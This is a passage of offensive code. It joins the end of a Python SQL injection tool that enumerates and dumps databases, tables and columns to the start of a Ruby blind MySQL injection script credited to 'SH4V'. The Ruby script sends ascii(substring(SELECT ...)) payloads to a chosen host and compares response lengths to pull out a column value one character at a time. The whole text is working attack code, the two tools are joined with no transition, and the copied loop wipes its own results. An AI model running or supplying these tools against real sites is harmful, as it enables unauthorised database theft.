len(match) >= 1: if mode == "--schema" or mode == "--full": match = match[0][2:].split("\x1e") if cur_db != match[0]: cur_db = match[0] if table_num == 0: print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n") else: print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n") print "[Table: Columns]";file.write("[Table: Columns]\n") if cur_table != match[1]: print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2], file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2]) cur_table = match[1] #table_num+=1 table_num = int(table_num) + 1 else: sys.stdout.write(",%s" % (match[2])) file.write(","+match[2]) sys.stdout.flush() #Gathering Databases only elif mode == "--dbs": match = match[0] if table_num == 0: print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) else: print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) table_num+=1 #Collect data from tables & columns elif mode == "--dump": match = re.findall("\x1e\x1e+.+\x1e\x1e",source) if match == []: match = [''] else: match = match[0].strip("\x1e").split("\x1e") if arg_rowdisp == 1: print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",) else: print;file.write("\n") for ddata in match: if ddata == "": ddata = "NoDataInColumn" sys.stdout.write("%s:" % (ddata)) file.write("%s:" % ddata) sys.stdout.flush() table_num+=1 else: if mode == "--dump": table_num+=1 sys.stdout.write("\n[%s] No data" % (num)) file.write("\n[%s] No data" % (num)) break num+=1 except (KeyboardInterrupt, SystemExit): raise except: pass ## Blind Schema Enumeration and DataExt loop if arg_blind == "--blind": if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info": lower_bound = 0 upper_bound = 127 print for data_row in range(int(num), row_value): sys.stdout.write("[%s]: " % (lim_num)) file.write("\n[%s]: " % (lim_num)) sys.stdout.flush() value = chr(upper_bound) while value != chr(0): if mode == "--info": Guess_URL = line_URL + str(let_pos)+",1))" else: Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))" value = chr(GuessValue(Guess_URL)) sys.stdout.write("%s" % (value)) file.write(value) sys.stdout.flush() let_pos+=1 print lim_num = int(lim_num) + 1 let_pos = 1 data_row+=1 #Lets wrap it up! if mode == "--schema" or mode == "--full" or mode == "--dump": print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) else: print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close()

#MySQL Blind Inyection Tool #Coder => SH4V #n3t-datagrams.net require 'net/http' puts "host:" host=gets.chomp puts "extension:" ext=gets.chomp puts "columna:" col=gets.chomp puts "tabla:" tab= gets.chomp num="0" url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body corp2=http.get("#{url}333") corp2=corp2.body lon1=corp1.length lon2=corp2.length while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),2,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),3,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),4,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),5,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),6,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),7,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),8,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),9,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),10,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),11,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),12,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),13,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),14,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),15,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),16,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),17,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),18,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),19,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),20,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),21,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),22,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end